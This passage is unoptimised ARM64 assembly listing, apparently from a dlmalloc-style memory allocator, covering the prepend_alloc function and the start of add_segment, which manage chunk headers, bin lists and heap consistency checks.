_prepend_alloc: ; @prepend_alloc
.cfi_startproc
; %bb.0:
sub sp, sp, #416
.cfi_def_cfa_offset 416
stp x28, x27, [sp, #384] ; 16-byte Folded Spill
stp x29, x30, [sp, #400] ; 16-byte Folded Spill
add x29, sp, #400
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
.cfi_offset w27, -24
.cfi_offset w28, -32
stur x0, [x29, #-24]
stur x1, [x29, #-32]
stur x2, [x29, #-40]
stur x3, [x29, #-48]
ldur x8, [x29, #-32]
str x8, [sp, #80] ; 8-byte Folded Spill
ldur x8, [x29, #-32]
add x8, x8, #16
ands x8, x8, #0xf
cset w8, ne
tbnz w8, #0, LBB38_2
b LBB38_1
LBB38_1:
mov x8, #0
str x8, [sp, #72] ; 8-byte Folded Spill
b LBB38_3
LBB38_2:
ldur x8, [x29, #-32]
add x8, x8, #16
and x9, x8, #0xf
mov x8, #16
subs x8, x8, x9
and x8, x8, #0xf
str x8, [sp, #72] ; 8-byte Folded Spill
b LBB38_3
LBB38_3:
ldr x8, [sp, #80] ; 8-byte Folded Reload
ldr x9, [sp, #72] ; 8-byte Folded Reload
add x8, x8, x9
stur x8, [x29, #-56]
ldur x8, [x29, #-40]
str x8, [sp, #64] ; 8-byte Folded Spill
ldur x8, [x29, #-40]
add x8, x8, #16
ands x8, x8, #0xf
cset w8, ne
tbnz w8, #0, LBB38_5
b LBB38_4
LBB38_4:
mov x8, #0
str x8, [sp, #56] ; 8-byte Folded Spill
b LBB38_6
LBB38_5:
ldur x8, [x29, #-40]
add x8, x8, #16
and x9, x8, #0xf
mov x8, #16
subs x8, x8, x9
and x8, x8, #0xf
str x8, [sp, #56] ; 8-byte Folded Spill
b LBB38_6
LBB38_6:
ldr x8, [sp, #64] ; 8-byte Folded Reload
ldr x9, [sp, #56] ; 8-byte Folded Reload
add x8, x8, x9
stur x8, [x29, #-64]
ldur x8, [x29, #-64]
ldur x9, [x29, #-56]
subs x8, x8, x9
stur x8, [x29, #-72]
ldur x8, [x29, #-56]
ldur x9, [x29, #-48]
add x8, x8, x9
stur x8, [x29, #-80]
ldur x8, [x29, #-72]
ldur x9, [x29, #-48]
subs x8, x8, x9
stur x8, [x29, #-88]
ldur x8, [x29, #-48]
orr x8, x8, #0x1
orr x8, x8, #0x2
ldur x9, [x29, #-56]
str x8, [x9, #8]
ldur x8, [x29, #-64]
ldur x9, [x29, #-24]
ldr x9, [x9, #40]
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB38_8
b LBB38_7
LBB38_7:
ldur x10, [x29, #-88]
ldur x9, [x29, #-24]
ldr x8, [x9, #16]
add x8, x8, x10
str x8, [x9, #16]
stur x8, [x29, #-96]
ldur x8, [x29, #-80]
ldur x9, [x29, #-24]
str x8, [x9, #40]
ldur x8, [x29, #-96]
orr x8, x8, #0x1
ldur x9, [x29, #-80]
str x8, [x9, #8]
b LBB38_117
LBB38_8:
ldur x8, [x29, #-64]
ldur x9, [x29, #-24]
ldr x9, [x9, #32]
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB38_10
b LBB38_9
LBB38_9:
ldur x10, [x29, #-88]
ldur x9, [x29, #-24]
ldr x8, [x9, #8]
add x8, x8, x10
str x8, [x9, #8]
stur x8, [x29, #-104]
ldur x8, [x29, #-80]
ldur x9, [x29, #-24]
str x8, [x9, #32]
ldur x8, [x29, #-104]
orr x8, x8, #0x1
ldur x9, [x29, #-80]
str x8, [x9, #8]
ldur x8, [x29, #-104]
ldur x9, [x29, #-80]
ldur x10, [x29, #-104]
str x8, [x9, x10]
b LBB38_116
LBB38_10:
ldur x8, [x29, #-64]
ldr x8, [x8, #8]
and x8, x8, #0x3
subs x8, x8, #1
cset w8, ne
tbnz w8, #0, LBB38_80
b LBB38_11
LBB38_11:
ldur x8, [x29, #-64]
ldr x8, [x8, #8]
and x8, x8, #0xfffffffffffffff8
stur x8, [x29, #-112]
ldur x8, [x29, #-112]
lsr x8, x8, #3
subs x8, x8, #32
cset w8, hs
tbnz w8, #0, LBB38_30
b LBB38_12
LBB38_12:
ldur x8, [x29, #-64]
ldr x8, [x8, #16]
stur x8, [x29, #-120]
ldur x8, [x29, #-64]
ldr x8, [x8, #24]
stur x8, [x29, #-128]
ldur x8, [x29, #-112]
lsr x8, x8, #3
; kill: def $w8 killed $w8 killed $x8
stur w8, [x29, #-132]
ldur x8, [x29, #-120]
ldur x9, [x29, #-24]
add x9, x9, #72
ldur w10, [x29, #-132]
lsl w10, w10, #1
add x9, x9, w10, uxtw #3
subs x8, x8, x9
cset w8, eq
mov w9, #1
str w9, [sp, #52] ; 4-byte Folded Spill
tbnz w8, #0, LBB38_16
b LBB38_13
LBB38_13:
ldur x8, [x29, #-120]
ldur x9, [x29, #-24]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w8, lo
mov w9, #0
str w9, [sp, #48] ; 4-byte Folded Spill
tbnz w8, #0, LBB38_15
b LBB38_14
LBB38_14:
ldur x8, [x29, #-120]
ldr x8, [x8, #24]
ldur x9, [x29, #-64]
subs x8, x8, x9
cset w8, eq
str w8, [sp, #48] ; 4-byte Folded Spill
b LBB38_15
LBB38_15:
ldr w8, [sp, #48] ; 4-byte Folded Reload
str w8, [sp, #52] ; 4-byte Folded Spill
b LBB38_16
LBB38_16:
ldr w8, [sp, #52] ; 4-byte Folded Reload
; kill: def $x8 killed $w8
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB38_28
b LBB38_17
LBB38_17:
ldur x8, [x29, #-128]
ldur x9, [x29, #-120]
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB38_19
b LBB38_18
LBB38_18:
ldur w9, [x29, #-132]
mov w8, #1
lsl w10, w8, w9
ldur x9, [x29, #-24]
ldr w8, [x9]
bic w8, w8, w10
str w8, [x9]
b LBB38_27
LBB38_19:
ldur x8, [x29, #-128]
ldur x9, [x29, #-24]
add x9, x9, #72
ldur w10, [x29, #-132]
lsl w10, w10, #1
add x9, x9, w10, uxtw #3
subs x8, x8, x9
cset w8, eq
mov w9, #1
str w9, [sp, #44] ; 4-byte Folded Spill
tbnz w8, #0, LBB38_23
b LBB38_20
LBB38_20:
ldur x8, [x29, #-128]
ldur x9, [x29, #-24]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w8, lo
mov w9, #0
str w9, [sp, #40] ; 4-byte Folded Spill
tbnz w8, #0, LBB38_22
b LBB38_21
LBB38_21:
ldur x8, [x29, #-128]
ldr x8, [x8, #16]
ldur x9, [x29, #-64]
subs x8, x8, x9
cset w8, eq
str w8, [sp, #40] ; 4-byte Folded Spill
b LBB38_22
LBB38_22:
ldr w8, [sp, #40] ; 4-byte Folded Reload
str w8, [sp, #44] ; 4-byte Folded Spill
b LBB38_23
LBB38_23:
ldr w8, [sp, #44] ; 4-byte Folded Reload
; kill: def $x8 killed $w8
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB38_25
b LBB38_24
LBB38_24:
ldur x8, [x29, #-128]
ldur x9, [x29, #-120]
str x8, [x9, #24]
ldur x8, [x29, #-120]
ldur x9, [x29, #-128]
str x8, [x9, #16]
b LBB38_26
LBB38_25:
bl _abort
LBB38_26:
b LBB38_27
LBB38_27:
b LBB38_29
LBB38_28:
bl _abort
LBB38_29:
b LBB38_79
LBB38_30:
ldur x8, [x29, #-64]
stur x8, [x29, #-144]
ldur x8, [x29, #-144]
ldr x8, [x8, #48]
stur x8, [x29, #-152]
ldur x8, [x29, #-144]
ldr x8, [x8, #24]
ldur x9, [x29, #-144]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB38_38
b LBB38_31
LBB38_31:
ldur x8, [x29, #-144]
ldr x8, [x8, #16]
stur x8, [x29, #-168]
ldur x8, [x29, #-144]
ldr x8, [x8, #24]
stur x8, [x29, #-160]
ldur x8, [x29, #-168]
ldur x9, [x29, #-24]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w8, lo
mov w9, #0
str w9, [sp, #36] ; 4-byte Folded Spill
tbnz w8, #0, LBB38_34
b LBB38_32
LBB38_32:
ldur x8, [x29, #-168]
ldr x8, [x8, #24]
ldur x9, [x29, #-144]
subs x8, x8, x9
cset w8, ne
mov w9, #0
str w9, [sp, #36] ; 4-byte Folded Spill
tbnz w8, #0, LBB38_34
b LBB38_33
LBB38_33:
ldur x8, [x29, #-160]
ldr x8, [x8, #16]
ldur x9, [x29, #-144]
subs x8, x8, x9
cset w8, eq
str w8, [sp, #36] ; 4-byte Folded Spill
b LBB38_34
LBB38_34:
ldr w8, [sp, #36] ; 4-byte Folded Reload
; kill: def $x8 killed $w8
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB38_36
b LBB38_35
LBB38_35:
ldur x8, [x29, #-160]
ldur x9, [x29, #-168]
str x8, [x9, #24]
ldur x8, [x29, #-168]
ldur x9, [x29, #-160]
str x8, [x9, #16]
b LBB38_37
LBB38_36:
bl _abort
LBB38_37:
b LBB38_50
LBB38_38:
ldur x8, [x29, #-144]
add x9, x8, #40
stur x9, [x29, #-176]
ldr x8, [x8, #40]
mov x9, x8
stur x9, [x29, #-160]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB38_40
b LBB38_39
LBB38_39:
ldur x8, [x29, #-144]
add x9, x8, #32
stur x9, [x29, #-176]
ldr x8, [x8, #32]
mov x9, x8
stur x9, [x29, #-160]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB38_49
b LBB38_40
LBB38_40:
b LBB38_41
LBB38_41: ; =>This Inner Loop Header: Depth=1
ldur x8, [x29, #-160]
add x9, x8, #40
stur x9, [x29, #-184]
ldr x8, [x8, #40]
subs x8, x8, #0
cset w8, ne
mov w9, #1
str w9, [sp, #32] ; 4-byte Folded Spill
tbnz w8, #0, LBB38_43
b LBB38_42
LBB38_42: ; in Loop: Header=BB38_41 Depth=1
ldur x8, [x29, #-160]
add x9, x8, #32
stur x9, [x29, #-184]
ldr x8, [x8, #32]
subs x8, x8, #0
cset w8, ne
str w8, [sp, #32] ; 4-byte Folded Spill
b LBB38_43
LBB38_43: ; in Loop: Header=BB38_41 Depth=1
ldr w8, [sp, #32] ; 4-byte Folded Reload
tbz w8, #0, LBB38_45
b LBB38_44
LBB38_44: ; in Loop: Header=BB38_41 Depth=1
ldur x8, [x29, #-184]
mov x9, x8
stur x9, [x29, #-176]
ldr x8, [x8]
stur x8, [x29, #-160]
b LBB38_41
LBB38_45:
ldur x8, [x29, #-176]
ldur x9, [x29, #-24]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB38_47
b LBB38_46
LBB38_46:
ldur x8, [x29, #-176]
; kill: def $x9 killed $xzr
str xzr, [x8]
b LBB38_48
LBB38_47:
bl _abort
LBB38_48:
b LBB38_49
LBB38_49:
b LBB38_50
LBB38_50:
ldur x8, [x29, #-152]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB38_78
b LBB38_51
LBB38_51:
ldur x8, [x29, #-24]
add x8, x8, #600
ldur x9, [x29, #-144]
ldr w9, [x9, #56]
; kill: def $x9 killed $w9
add x8, x8, x9, lsl #3
stur x8, [x29, #-192]
ldur x8, [x29, #-144]
ldur x9, [x29, #-192]
ldr x9, [x9]
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB38_55
b LBB38_52
LBB38_52:
ldur x8, [x29, #-160]
ldur x10, [x29, #-192]
mov x9, x8
str x9, [x10]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB38_54
b LBB38_53
LBB38_53:
ldur x8, [x29, #-144]
ldr w9, [x8, #56]
mov w8, #1
lsl w10, w8, w9
ldur x9, [x29, #-24]
ldr w8, [x9, #4]
bic w8, w8, w10
str w8, [x9, #4]
b LBB38_54
LBB38_54:
b LBB38_62
LBB38_55:
ldur x8, [x29, #-152]
ldur x9, [x29, #-24]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB38_60
b LBB38_56
LBB38_56:
ldur x8, [x29, #-152]
ldr x8, [x8, #32]
ldur x9, [x29, #-144]
subs x8, x8, x9
cset w8, ne
tbnz w8, #0, LBB38_58
b LBB38_57
LBB38_57:
ldur x8, [x29, #-160]
ldur x9, [x29, #-152]
str x8, [x9, #32]
b LBB38_59
LBB38_58:
ldur x8, [x29, #-160]
ldur x9, [x29, #-152]
str x8, [x9, #40]
b LBB38_59
LBB38_59:
b LBB38_61
LBB38_60:
bl _abort
LBB38_61:
b LBB38_62
LBB38_62:
ldur x8, [x29, #-160]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB38_77
b LBB38_63
LBB38_63:
ldur x8, [x29, #-160]
ldur x9, [x29, #-24]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB38_75
b LBB38_64
LBB38_64:
ldur x8, [x29, #-152]
ldur x9, [x29, #-160]
str x8, [x9, #48]
ldur x8, [x29, #-144]
ldr x8, [x8, #32]
mov x9, x8
str x9, [sp, #200]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB38_69
b LBB38_65
LBB38_65:
ldr x8, [sp, #200]
ldur x9, [x29, #-24]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB38_67
b LBB38_66
LBB38_66:
ldr x8, [sp, #200]
ldur x9, [x29, #-160]
str x8, [x9, #32]
ldur x8, [x29, #-160]
ldr x9, [sp, #200]
str x8, [x9, #48]
b LBB38_68
LBB38_67:
bl _abort
LBB38_68:
b LBB38_69
LBB38_69:
ldur x8, [x29, #-144]
ldr x8, [x8, #40]
mov x9, x8
str x9, [sp, #192]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB38_74
b LBB38_70
LBB38_70:
ldr x8, [sp, #192]
ldur x9, [x29, #-24]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB38_72
b LBB38_71
LBB38_71:
ldr x8, [sp, #192]
ldur x9, [x29, #-160]
str x8, [x9, #40]
ldur x8, [x29, #-160]
ldr x9, [sp, #192]
str x8, [x9, #48]
b LBB38_73
LBB38_72:
bl _abort
LBB38_73:
b LBB38_74
LBB38_74:
b LBB38_76
LBB38_75:
bl _abort
LBB38_76:
b LBB38_77
LBB38_77:
b LBB38_78
LBB38_78:
b LBB38_79
LBB38_79:
ldur x8, [x29, #-64]
ldur x9, [x29, #-112]
add x8, x8, x9
stur x8, [x29, #-64]
ldur x9, [x29, #-112]
ldur x8, [x29, #-88]
add x8, x8, x9
stur x8, [x29, #-88]
b LBB38_80
LBB38_80:
ldur x9, [x29, #-64]
ldr x8, [x9, #8]
and x8, x8, #0xfffffffffffffffe
str x8, [x9, #8]
ldur x8, [x29, #-88]
orr x8, x8, #0x1
ldur x9, [x29, #-80]
str x8, [x9, #8]
ldur x8, [x29, #-88]
ldur x9, [x29, #-80]
ldur x10, [x29, #-88]
str x8, [x9, x10]
ldur x8, [x29, #-88]
lsr x8, x8, #3
subs x8, x8, #32
cset w8, hs
tbnz w8, #0, LBB38_88
b LBB38_81
LBB38_81:
ldur x8, [x29, #-88]
lsr x8, x8, #3
; kill: def $w8 killed $w8 killed $x8
str w8, [sp, #188]
ldur x8, [x29, #-24]
add x8, x8, #72
ldr w9, [sp, #188]
lsl w9, w9, #1
add x8, x8, w9, uxtw #3
str x8, [sp, #176]
ldr x8, [sp, #176]
str x8, [sp, #168]
ldur x8, [x29, #-24]
ldr w8, [x8]
ldr w10, [sp, #188]
mov w9, #1
lsl w9, w9, w10
ands w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB38_83
b LBB38_82
LBB38_82:
ldr w9, [sp, #188]
mov w8, #1
lsl w10, w8, w9
ldur x9, [x29, #-24]
ldr w8, [x9]
orr w8, w8, w10
str w8, [x9]
b LBB38_87
LBB38_83:
ldr x8, [sp, #176]
ldr x8, [x8, #16]
ldur x9, [x29, #-24]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB38_85
b LBB38_84
LBB38_84:
ldr x8, [sp, #176]
ldr x8, [x8, #16]
str x8, [sp, #168]
b LBB38_86
LBB38_85:
bl _abort
LBB38_86:
b LBB38_87
LBB38_87:
ldur x8, [x29, #-80]
ldr x9, [sp, #176]
str x8, [x9, #16]
ldur x8, [x29, #-80]
ldr x9, [sp, #168]
str x8, [x9, #24]
ldr x8, [sp, #168]
ldur x9, [x29, #-80]
str x8, [x9, #16]
ldr x8, [sp, #176]
ldur x9, [x29, #-80]
str x8, [x9, #24]
b LBB38_115
LBB38_88:
ldur x8, [x29, #-80]
str x8, [sp, #160]
ldur x8, [x29, #-88]
lsr x8, x8, #8
str x8, [sp, #136]
ldr x8, [sp, #136]
subs x8, x8, #0
cset w8, ne
tbnz w8, #0, LBB38_90
b LBB38_89
LBB38_89:
str wzr, [sp, #148]
b LBB38_94
LBB38_90:
ldr x8, [sp, #136]
subs x8, x8, #16, lsl #12 ; =65536
cset w8, lo
tbnz w8, #0, LBB38_92
b LBB38_91
LBB38_91:
mov w8, #31
str w8, [sp, #148]
b LBB38_93
LBB38_92:
ldr x8, [sp, #136]
; kill: def $w8 killed $w8 killed $x8
str w8, [sp, #132]
ldr w8, [sp, #132]
subs w8, w8, #256
lsr w8, w8, #16
and w8, w8, #0x8
str w8, [sp, #128]
ldr w9, [sp, #128]
ldr w8, [sp, #132]
lsl w8, w8, w9
str w8, [sp, #132]
subs w8, w8, #1, lsl #12 ; =4096
lsr w8, w8, #16
and w8, w8, #0x4
str w8, [sp, #124]
ldr w9, [sp, #124]
ldr w8, [sp, #128]
add w8, w8, w9
str w8, [sp, #128]
ldr w9, [sp, #124]
ldr w8, [sp, #132]
lsl w8, w8, w9
str w8, [sp, #132]
subs w8, w8, #4, lsl #12 ; =16384
lsr w8, w8, #16
and w9, w8, #0x2
str w9, [sp, #124]
ldr w8, [sp, #128]
add w8, w8, w9
str w8, [sp, #128]
ldr w9, [sp, #128]
mov w8, #14
subs w8, w8, w9
ldr w10, [sp, #124]
ldr w9, [sp, #132]
lsl w9, w9, w10
str w9, [sp, #132]
add w8, w8, w9, lsr #15
str w8, [sp, #124]
ldr w8, [sp, #124]
lsl w8, w8, #1
; kill: def $x8 killed $w8
ldur x9, [x29, #-88]
ldr w10, [sp, #124]
add w10, w10, #7
; kill: def $x10 killed $w10
lsr x9, x9, x10
and x9, x9, #0x1
add x8, x8, x9
; kill: def $w8 killed $w8 killed $x8
str w8, [sp, #148]
b LBB38_93
LBB38_93:
b LBB38_94
LBB38_94:
ldur x8, [x29, #-24]
add x8, x8, #600
ldr w9, [sp, #148]
; kill: def $x9 killed $w9
add x8, x8, x9, lsl #3
str x8, [sp, #152]
ldr w8, [sp, #148]
ldr x9, [sp, #160]
str w8, [x9, #56]
ldr x8, [sp, #160]
; kill: def $x9 killed $xzr
str xzr, [x8, #40]
ldr x8, [sp, #160]
str xzr, [x8, #32]
ldur x8, [x29, #-24]
ldr w8, [x8, #4]
ldr w10, [sp, #148]
mov w9, #1
lsl w9, w9, w10
ands w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB38_96
b LBB38_95
LBB38_95:
ldr w9, [sp, #148]
mov w8, #1
lsl w10, w8, w9
ldur x9, [x29, #-24]
ldr w8, [x9, #4]
orr w8, w8, w10
str w8, [x9, #4]
ldr x8, [sp, #160]
ldr x9, [sp, #152]
str x8, [x9]
ldr x8, [sp, #152]
ldr x9, [sp, #160]
str x8, [x9, #48]
ldr x8, [sp, #160]
ldr x9, [sp, #160]
str x8, [x9, #24]
ldr x9, [sp, #160]
str x8, [x9, #16]
b LBB38_114
LBB38_96:
ldr x8, [sp, #152]
ldr x8, [x8]
str x8, [sp, #112]
ldur x8, [x29, #-88]
str x8, [sp, #24] ; 8-byte Folded Spill
ldr w8, [sp, #148]
subs w8, w8, #31
cset w8, ne
tbnz w8, #0, LBB38_98
b LBB38_97
LBB38_97:
mov x8, #0
str x8, [sp, #16] ; 8-byte Folded Spill
b LBB38_99
LBB38_98:
ldr w8, [sp, #148]
lsr w8, w8, #1
add w8, w8, #8
subs w8, w8, #2
mov x9, x8
mov x8, #63
subs x8, x8, x9
str x8, [sp, #16] ; 8-byte Folded Spill
b LBB38_99
LBB38_99:
ldr x8, [sp, #24] ; 8-byte Folded Reload
ldr x9, [sp, #16] ; 8-byte Folded Reload
lsl x8, x8, x9
str x8, [sp, #104]
b LBB38_100
LBB38_100: ; =>This Inner Loop Header: Depth=1
ldr x8, [sp, #112]
ldr x8, [x8, #8]
and x8, x8, #0xfffffffffffffff8
ldur x9, [x29, #-88]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB38_107
b LBB38_101
LBB38_101: ; in Loop: Header=BB38_100 Depth=1
ldr x8, [sp, #112]
add x8, x8, #32
ldr x9, [sp, #104]
lsr x9, x9, #63
and x9, x9, #0x1
add x8, x8, x9, lsl #3
str x8, [sp, #96]
ldr x8, [sp, #104]
lsl x8, x8, #1
str x8, [sp, #104]
ldr x8, [sp, #96]
ldr x8, [x8]
subs x8, x8, #0
cset w8, eq
tbnz w8, #0, LBB38_103
b LBB38_102
LBB38_102: ; in Loop: Header=BB38_100 Depth=1
ldr x8, [sp, #96]
ldr x8, [x8]
str x8, [sp, #112]
b LBB38_106
LBB38_103:
ldr x8, [sp, #96]
ldur x9, [x29, #-24]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w9, hs
; implicit-def: $x8
mov x8, x9
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB38_105
b LBB38_104
LBB38_104:
ldr x8, [sp, #160]
ldr x9, [sp, #96]
str x8, [x9]
ldr x8, [sp, #112]
ldr x9, [sp, #160]
str x8, [x9, #48]
ldr x8, [sp, #160]
ldr x9, [sp, #160]
str x8, [x9, #24]
ldr x9, [sp, #160]
str x8, [x9, #16]
b LBB38_113
LBB38_105:
bl _abort
LBB38_106: ; in Loop: Header=BB38_100 Depth=1
b LBB38_112
LBB38_107:
ldr x8, [sp, #112]
ldr x8, [x8, #16]
str x8, [sp, #88]
ldr x8, [sp, #112]
ldur x9, [x29, #-24]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w8, lo
mov w9, #0
str w9, [sp, #12] ; 4-byte Folded Spill
tbnz w8, #0, LBB38_109
b LBB38_108
LBB38_108:
ldr x8, [sp, #88]
ldur x9, [x29, #-24]
ldr x9, [x9, #24]
subs x8, x8, x9
cset w8, hs
str w8, [sp, #12] ; 4-byte Folded Spill
b LBB38_109
LBB38_109:
ldr w8, [sp, #12] ; 4-byte Folded Reload
; kill: def $x8 killed $w8
ands x8, x8, #0x1
cset w8, eq
tbnz w8, #0, LBB38_111
b LBB38_110
LBB38_110:
ldr x8, [sp, #160]
ldr x9, [sp, #88]
str x8, [x9, #24]
ldr x9, [sp, #112]
str x8, [x9, #16]
ldr x8, [sp, #88]
ldr x9, [sp, #160]
str x8, [x9, #16]
ldr x8, [sp, #112]
ldr x9, [sp, #160]
str x8, [x9, #24]
ldr x8, [sp, #160]
; kill: def $x9 killed $xzr
str xzr, [x8, #48]
b LBB38_113
LBB38_111:
bl _abort
LBB38_112: ; in Loop: Header=BB38_100 Depth=1
b LBB38_100
LBB38_113:
b LBB38_114
LBB38_114:
b LBB38_115
LBB38_115:
b LBB38_116
LBB38_116:
b LBB38_117
LBB38_117:
ldur x8, [x29, #-56]
add x0, x8, #16
ldp x29, x30, [sp, #400] ; 16-byte Folded Reload
ldp x28, x27, [sp, #384] ; 16-byte Folded Reload
add sp, sp, #416
ret
.cfi_endproc
; -- End function
.p2align 2 ; -- Begin function add_segment
_add_segment: ; @add_segment
.cfi_startproc
; %bb.0:
sub sp, sp, #352
.cfi_def_cfa_offset 352
stp x28, x27, [sp, #320] ; 16-byte Folded Spill
stp x29, x30, [sp, #336] ; 16-byte Folded Spill
add x29, sp, #336
.cfi_def_cfa w29, 16
.cfi_offset w30, -8
.cfi_offset w29, -16
.cfi_offset w27, -24
.cfi_offset w28, -32
stur x0, [x29, #-24]
stur x1, [x29, #-32]
stur x2, [x29, #-40]
stur w3, [x29, #-44]
ldur x8, [x29, #-24]
ldr x8, [x8, #40]
stur x8, [x29, #-56]
ldur x0, [x29, #-24]
ldur x1, [x29, #-56]
bl _segment_holding
stur x0, [x29, #-64]
ldur x8, [x29, #-64]
ldr x8, [x8]
ldur x9, [x29, #-64]
ldr x9, [x9, #8]
add x8, x8, x9
stur x8, [x29, #-72]
mov x8, #48
stur x8, [x29, #-80]
ldur x8, [x29, #-72]
ldur x9, [x29, #-80]
add x9, x9, #32
add x9, x9, #15
subs x8, x8, x9
stur x8, [x29, #-88]
ldur x8, [x29, #-88]
add x8, x8, #16
ands x8, x8, #0xf
cset w8, ne
tbnz w8, #0, LBB39_2
b LBB39_1
LBB39_1:
mov x8, #0
str x8, [sp, #40] ; 8-byte Folded Spill
b LBB39_3
LBB39_2:
ldur x8, [x29, #-88]
add x8, x8, #16
and x9, x8, #0xf
mov x8, #16
subs x8, x8, x9
and x8, x8, #0xf
str x8, [sp, #40] ; 8-byte Folded Spill
b LBB39_3
LBB39_3:
ldr x8, [sp, #40] ; 8-byte Folded Reload
stur x8, [x29, #-96]
ldur x8, [x29, #-88]
ldur x9, [x29, #-96]
add x8, x8, x9
stur x8, [x29, #-104]
ldur x8, [x29, #-104]
ldur x9, [x29, #-56]
add x9, x9, #32
subs x8, x8, x9
cset w8, hs
tbnz w8, #0, LBB39_5
b LBB39_4
LBB39_4:
ldur x8, [x29, #-56]
str x8, [sp, #32] ; 8-byte Folded Spill
b LBB39_6
LBB39_5:
ldur x8, [x29, #-104]
str x8, [sp, #32] ; 8-byte Folded Spill
b LBB39_6
LBB39_6:
ldr x8, [sp, #32] ; 8-byte Folded Reload
stur x8, [x29, #-112]
ldur x8, [x29, #-112]
stur x8, [x29, #-120]
ldur x8, [x29, #-120]
add x8, x8, #16
stur x8, [x29, #-128]
ldur x8, [x29, #-120]
ldur x9, [x29, #-80]
add x8, x8, x9
stur x8, [x29, #-136]
ldur x8, [x29, #-136]
stur x8, [x29, #-144]
stur wzr, [x29, #-148]
ldur x0, [x29, #-24]
ldur x1, [x29, #-32]
ldur x8, [x29, #-40]
subs x2, x8, #80
bl _init_top
ldur x8, [x29, #-80]
orr x8, x8, #0x1
orr x8, x8, #0x2
ldur x9, [x29, #-120]
str x8, [x9, #8]
ldur x8, [x29, #-128]
ldur x9, [x29, #-24]
mov x10, x9
add x10, x10, #888
ldr q0, [x10]
str q0, [x8]
add x9, x9, #904
ldr q0, [x9]
str q0, [x8, #16]
ldur x8, [x29, #-32]
ldur x9, [x29, #-24]
str x8, [x9, #888]
ldur x8, [x29, #-40]
ldur x9, [x29, #-24]
str x8, [x9, #896]
ldur w8, [x29, #-44]
ldur x9, [x29, #-24]
str w8, [x9, #912]
ldur x8, [x29, #-128]
ldur x9, [x29, #-24]
str x8, [x9, #904]
b LBB39_7
LBB39_7: ; =>This Inner Loop Header: Depth=1
ldur x8, [x29, #-144]
add x8, x8, #8
stur x8, [x29, #-160]
ldur x9, [x29, #-144]
mov x8, #11
str x8, [x9, #8]
ldur w8, [x29, #-148]
add w8, w8, #1
stur w8, [x29, #-148]
ldur x8, [x29, #-160]
add x8, x8, #8
ldur x9, [x29, #-72]
subs x8, x8, x9
cset w8, hs
tbnz w8, #0, LBB39_9
b LBB39_8
LBB39_8: ; in Loop: Header=BB39_7 Depth=1
ldur x8, [x29, #-160]
stur x8, [x29, #-144]
b LBB39_10
LBB39_9:
b LBB39_11
LBB39_10: ; in Loop: Header=BB39_7 Depth=1
b LBB39_7
LBB39_11:
ldur x8, [x29, #-112]
ldur x9, [x29, #-56]
subs x8, x8, x9
cset w8, eq
tbnz w8, #0, LBB39_48
b LBB39_12
LBB39_12:
ldur x8, [x29, #-56]
str x8, [sp, #168]
ldur x8, [x29, #-112]
ldur x9, [x29, #-56]
subs x8, x8, x9
str x8, [sp, #160]
ldr x8, [sp, #168]
ldr x9, [sp, #160]
add x8, x8, x9
str x8, [sp, #152]
ldr x9, [sp, #152]
ldr x8, [x9, #8]
and x8, x8, #0xfffffffffffffffe
str x8, [x9, #8]
ldr x8, [sp, #160]
orr x8, x8, #0x1
ldr x9, [sp, #168]
str x8, [x9, #8]
ldr x8, [sp, #160]
ldr x9, [sp, #168]
ldr x10, [sp, #160]
str x8, [x9, x10]
ldr x8, [sp, #160]
lsr x8, x8, #3
subs x8, x8, #32
cset w8, hs
tbnz w8, #0, LBB39_20
b LBB39_13
LBB39_13:
ldr x8, [sp, #160]
lsr x8, x8, #3
; kill: def $w8 killed $w8 killed $x8
str w8, [sp, #148]
ldur x8, [x29, #-24]
add x8, x8, #72
ldr w9, [sp, #148]
lsl w9, w9, #1
add x8, x8, w9, uxtw #3
str x8, [sp, #136]
ldr x8, [sp, #136]
str x8, [sp, #128]
ldur x8, [x29, #-24]
ldr w8, [x8]
ldr w10, [sp, #148]
mov w9, #1
lsl w9, w9, w10
ands w8, w8, w9
cset w8, ne
tbnz w8, #0, LBB39_15
b LBB39_14
LBB39_14:
ldr w9, [sp, #148]
mov w8, #1
lsl w10, w8, w9
ldur x9, [x29, #-24]
ldr w8, [x9]
